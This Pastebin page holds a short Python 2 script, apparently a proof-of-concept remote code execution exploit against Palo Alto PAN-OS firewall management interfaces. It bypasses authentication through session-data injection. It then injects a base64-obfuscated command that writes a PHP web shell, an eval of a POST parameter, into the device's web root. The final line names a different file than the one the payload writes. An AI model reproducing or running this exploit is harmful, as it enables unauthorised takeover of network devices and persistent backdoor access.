G2A Many GEOs
SHARE
TWEET

panos-rce-poc-v1.py

a guest Mar 13th, 2018 406 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import urllib
  2. import urllib2
  3. import ssl  
  4. import sys
  5.  
  6. ssl._create_default_https_context = ssl._create_unverified_context
  7.  
  8. domain = "192.168.1.1"
  9.  
  10. #pass auth
  11. print "step 1: pass_auth"
  12. pass_auth_url = "https://" + domain + "/esp/cms_changeDeviceContext.esp?device=1024:bbbb'\";user|s:"
  13. print "pass_auth request:    " + pass_auth_url
  14. request = urllib2.Request(pass_auth_url)
  15. response = urllib2.urlopen(request)
  16. print "pass_auth respone:    " + response.read()
  17. session_start_index = response.headers['Set-Cookie'].find("PHPSESSID")
  18. if session_start_index == -1:
  19.     print "pass_auth fail!!"
  20.     sys.exit()
  21. session = response.headers['Set-Cookie'][session_start_index:]
  22. session = session[:session.find(';')]
  23. auth_headers = {
  24.  'Cookie':session,
  25.  'Connection':'keep-alive'
  26. }
  27.  
  28.  
  29. print "\n"
  30. print "step 2: check if pass auth"
  31. auth_url = "https://" + domain + "/php/utils/debug.php"
  32. print "auth_url request:    " + auth_url
  33. request = urllib2.Request(auth_url, headers = auth_headers)
  34. response = urllib2.urlopen(request)
  35. content = response.read()
  36. #print content
  37. if "Debug" not in content:
  38.     print "pass auth fail!!"
  39.     sys.exit()
  40. print "pass auth success!!"
  41.  
  42.  
  43. print "\n"
  44. print "setp 3: create dir"
  45. create_dir_url = "https://" + domain + "/php/utils/router.php/Administrator.get"
  46. print "create_dir request:    " + create_dir_url
  47. post_data = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\\\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLnBocCcsICd3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjd2FzaGVyZSddKTs/PiIpO2YuY2xvc2UoKTs=\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
  48. request = urllib2.Request(create_dir_url, headers = auth_headers, data=post_data)
  49. response = urllib2.urlopen(request)
  50.  
  51. print "\n"
  52. print "15 minutes later, visit https://" + domain + "/vudrc.php"
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top